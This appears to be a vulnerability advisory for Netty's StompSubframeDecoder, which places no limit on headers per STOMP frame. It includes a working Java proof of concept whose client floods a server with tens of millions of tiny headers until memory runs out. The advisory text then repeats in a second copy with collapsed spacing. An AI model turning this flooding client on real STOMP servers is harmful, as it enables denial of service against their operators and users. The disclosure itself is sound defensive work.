Summary
The StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.
Details
io.netty.handler.codec.stomp.StompSubframeDecoder implements the STOMP protocol. The maxLineLength parameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g., a: 1\n), which are accumulated in memory inside the DefaultStompHeadersSubframe until the JVM throws an OutOfMemoryError.
PoC
Run the server with -Xmx256m
public final class ServerApp {
public static void main(String[] args) throws Exception {
EventLoopGroup group = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
try {
ChannelFuture serverFuture = new ServerBootstrap()
.group(group)
.channel(NioServerSocketChannel.class)
.childHandler(new StompSubframeDecoder())
.bind(8080)
.sync();
serverFuture.channel().closeFuture().sync();
} finally {
group.shutdownGracefully();
}
}
}
public final class ClientApp {
public static void main(String[] args) throws Exception {
try (Socket socket = new Socket("127.0.0.1", 8080)) {
OutputStream out = socket.getOutputStream();
out.write("CONNECT\n".getBytes(StandardCharsets.UTF_8));
StringBuilder sb = new StringBuilder();
for (int i = 0; i < 1000; i++) {
sb.append("a:1\n");
}
byte[] bulkHeaders = sb.toString().getBytes(StandardCharsets.UTF_8);
for (int i = 1; i <= 50_000; i++) {
out.write(bulkHeaders);
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
Impact
Denial of Service: An attacker can easily exhaust the server's memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.
References
Summary
The StompSubframeDecoder fails to limit the total number of headers or their cumulative size per frame, allowing an attacker to cause an OutOfMemoryError, leading to a Denial of Service.
Details
io.netty.handler.codec.stomp.StompSubframeDecoderimplements the STOMP protocol. ThemaxLineLengthparameter restricts the length of individual header lines, but there is no mechanism to limit the total number of headers in a single STOMP frame. An attacker can send a large number of short headers (e.g.,a: 1\n), which are accumulated in memory inside theDefaultStompHeadersSubframeuntil the JVM throws an OutOfMemoryError.PoC
Run the server with
-Xmx256mImpact
Denial of Service: An attacker can easily exhaust the server's memory by sending a single malicious STOMP message. Any server exposing a STOMP endpoint based on StompSubframeDecoder is vulnerable to DoS.
References